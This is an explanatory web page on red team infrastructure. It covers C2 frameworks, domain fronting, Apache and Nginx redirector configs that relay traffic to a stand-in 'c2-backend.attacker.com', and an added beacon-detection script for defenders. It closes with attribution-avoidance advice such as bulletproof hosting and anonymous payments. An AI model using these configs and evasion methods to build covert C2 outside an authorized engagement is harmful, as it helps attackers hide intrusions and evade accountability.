What is Red Team Infrastructure?
Red team infrastructure forms the backbone of adversarial simulation operations, providing command and control (C2), payload delivery, and operational security capabilities. Modern red team infrastructure must be resilient, attribution-resistant, and capable of evading sophisticated detection systems while maintaining reliable communication with compromised assets.
Key components include C2 frameworks like Cobalt Strike, Covenant, and Empire, along with supporting infrastructure such as domain fronting, redirectors, payload hosting, and operational security measures. Proper infrastructure design balances functionality, stealth, and cost-effectiveness while minimizing attribution risk.
Command & Control Frameworks
Cobalt Strike
Commercial C2 framework with advanced post-exploitation capabilities.
• Advanced evasion techniques
• Team collaboration features
• Extensive payload options
• Commercial support and updates
Covenant
Open-source .NET C2 framework with web-based interface.
• Web-based management
• Built-in OPSEC features
• Modular payload system
• Active development community
Empire
PowerShell-based post-exploitation framework for Windows.
• Extensive module library
• Cryptographically secure
• Multi-platform support
• REST API interface
Mythic
Cross-platform C2 framework with containerized architecture.
• Multiple agent types
• Web-based interface
• Extensible plugin system
• Multi-operator support
Infrastructure Components
Domain Fronting
Technique that uses legitimate CDN domains to hide C2 traffic behind trusted services: the TLS connection is opened to a high-reputation domain served by the CDN (the name carried in the SNI extension), while the HTTP Host header inside the encrypted session names the operator's own CDN-backed host, so the CDN forwards the request to that origin. The Apache configuration below is not the fronting itself but the edge redirector behind it: it routes on the Host header, proxying requests for the C2 hostname to the backend and serving ordinary content for everything else. For defenders, the disagreement between SNI and Host header is the characteristic signal, visible wherever TLS is terminated or inspected.
# Apache redirector configuration (requires mod_ssl, mod_proxy, mod_proxy_http and mod_rewrite)
<VirtualHost *:443>
    ServerName legitimate-business.com
    DocumentRoot /var/www/html

    SSLEngine on
    SSLCertificateFile /etc/ssl/certs/cert.pem
    SSLCertificateKeyFile /etc/ssl/private/key.pem
    # Required for the [P] flag to proxy to an https:// backend
    SSLProxyEngine On

    # Proxy C2 requests to the backend
    ProxyPreserveHost On
    ProxyRequests Off

    # Host-header routing: only requests whose Host is the C2 hostname are proxied
    RewriteEngine On
    RewriteCond %{HTTP_HOST} ^evil-c2\.com$ [NC]
    RewriteRule ^(.*)$ https://c2-backend.attacker.com$1 [P,L]

    # Everything else is passed through unchanged and served from DocumentRoot
    RewriteRule ^(.*)$ - [L]
</VirtualHost>
C2 Redirectors
Intermediate servers that relay C2 traffic while hiding the actual C2 infrastructure.
# Nginx redirector configuration
server {
    listen 443 ssl;
    server_name redirector.example.com;
    ssl_certificate /etc/ssl/certs/cert.pem;
    ssl_certificate_key /etc/ssl/private/key.pem;

    # C2 traffic redirection
    location /api/ {
        proxy_pass https://c2-server.internal:443;
        # Backend certificate is not checked: the redirector accepts whatever c2-server.internal presents
        proxy_ssl_verify off;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

        # Hide server headers returned by the backend
        proxy_hide_header Server;
        proxy_hide_header X-Powered-By;
    }

    # Legitimate content for non-C2 requests
    location / {
        root /var/www/html;
        index index.html;
    }
}
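A redirector hides the C2 address, but the agent's check-in cadence that keeps the channel reliable still crosses the network perimeter. The following is an added example, not code from the original page, showing the defender's side: it groups outbound proxy log lines by client and destination host and scores how regular the inter-arrival times are. The log format (epoch seconds, client IP, destination host) and the log lines are constructed for the example.

```python
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, List, Optional, Tuple

# Constructed proxy log (not real traffic): "epoch_seconds client_ip destination_host" per line.
SAMPLE_LOG = """\
1700000000 10.0.0.5 redirector.example.com
1700000060 10.0.0.5 redirector.example.com
1700000119 10.0.0.5 redirector.example.com
1700000181 10.0.0.5 redirector.example.com
1700000240 10.0.0.5 redirector.example.com
1700000300 10.0.0.5 redirector.example.com
1700000012 10.0.0.9 news.example.org
1700000033 10.0.0.9 news.example.org
1700000250 10.0.0.9 news.example.org
1700000251 10.0.0.9 news.example.org
1700000700 10.0.0.9 news.example.org
1700000701 10.0.0.9 news.example.org
1700000100 10.0.0.11 cdn-edge.example.net
1700000160 10.0.0.11 cdn-edge.example.net
"""

Flow = Tuple[str, str]


def parse_log(log: str) -> Dict[Flow, List[int]]:
    """Group request timestamps by (client, destination) flow."""
    flows: Dict[Flow, List[int]] = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, client, host = line.split()
        flows[(client, host)].append(int(ts))
    return flows


def beacon_score(timestamps: List[int], min_events: int = 5) -> Optional[Dict[str, float]]:
    """Coefficient of variation of the inter-arrival gaps: 0.0 means perfectly periodic.
    Returns None when there are too few events to judge or all events share one second."""
    ts = sorted(timestamps)
    if len(ts) < min_events:
        return None
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    avg = mean(gaps)
    if avg <= 0:
        return None  # a burst within a single second, not a cadence
    return {"events": len(ts), "mean_gap_s": float(avg), "cv": pstdev(gaps) / avg}


def find_beacons(log: str, max_cv: float = 0.2, min_events: int = 5) -> Dict[Flow, Dict[str, float]]:
    """Return flows whose check-in cadence is regular enough to look like a beacon."""
    hits: Dict[Flow, Dict[str, float]] = {}
    for flow, ts in parse_log(log).items():
        score = beacon_score(ts, min_events)
        if score is not None and score["cv"] <= max_cv:
            hits[flow] = score
    return hits


if __name__ == "__main__":
    for (client, host), s in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {host}: {s['events']} events, mean gap {s['mean_gap_s']:.0f}s, cv {s['cv']:.3f}")
```

Agents that add jitter to their sleep interval raise the coefficient of variation, so the threshold is a tuning knob rather than a constant, and long sleep intervals need a correspondingly long observation window before min_events is reached. Legitimate software updaters and telemetry agents also check in on a schedule, so the output is a candidate list to be joined with destination reputation, certificate age and the SNI/Host check, not a verdict on its own.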
Automated Infrastructure Deployment
Infrastructure-as-Code approach for rapid, consistent red team infrastructure deployment.
Ansible → Server configuration
Docker → Containerized C2 deployment
Let's Encrypt → Automated SSL certificates
Real-World Infrastructure Examples
Enterprise Red Team
Large-scale infrastructure for testing Fortune 500 company defenses.
• 5 geographically distributed C2 servers
• 15 redirectors across multiple CDNs
• Automated infrastructure rotation every 48 hours
• Domain categorization and reputation management
Government Red Team
High-security infrastructure for testing critical government systems.
• Air-gapped C2 servers in secure facilities
• Custom-developed C2 frameworks
• Multi-layer encryption and attribution avoidance
• Formal infrastructure approval and auditing
Financial Services Red Team
Compliance-focused infrastructure for regulated financial environments.
• Regulatory-compliant hosting and logging
• Business-categorized domains and certificates
• Extensive documentation and audit trails
• Integration with security orchestration platforms
Healthcare Red Team
Safety-focused infrastructure for testing medical device security.
• Isolated network segments for safety
• Non-disruptive testing methodologies
• HIPAA-compliant data handling
• Emergency cutoff and rollback procedures
OPSEC and Attribution Avoidance
Infrastructure OPSEC
• Use multiple layers of redirectors and never connect directly to C2
• Implement domain fronting and CDN-based traffic hiding
• Rotate infrastructure regularly and burn compromised assets
• Use legitimate business categorization for domains and IPs
• Implement proper SSL/TLS certificates from trusted CAs
• Monitor infrastructure for detection and compromise indicators
Attribution Avoidance
• Use bulletproof hosting services and anonymous payments
• Implement WHOIS privacy protection and proxy registrations
• Avoid patterns in domain names, IP ranges, and infrastructure
• Use VPN chains and anonymous communication methods
• Implement infrastructure automation to reduce human touch points
• Maintain operational security for team communications
Red Team Infrastructure Best Practices
✅ Do
• Implement defense in depth with multiple infrastructure layers
• Use Infrastructure-as-Code for consistent, repeatable deployments
• Maintain detailed operational security procedures and checklists
• Implement automated monitoring and alerting for infrastructure health
• Use legitimate business domains and proper SSL certificates
• Plan for infrastructure burning and rapid redeployment scenarios
❌ Don't
• Connect directly to C2 servers from operator workstations
• Reuse infrastructure components across different engagements
• Use predictable patterns in domain names or infrastructure layout
• Ignore infrastructure operational security and attribution risks
• Deploy infrastructure without proper monitoring and alerting
• Use unencrypted or poorly secured communication channels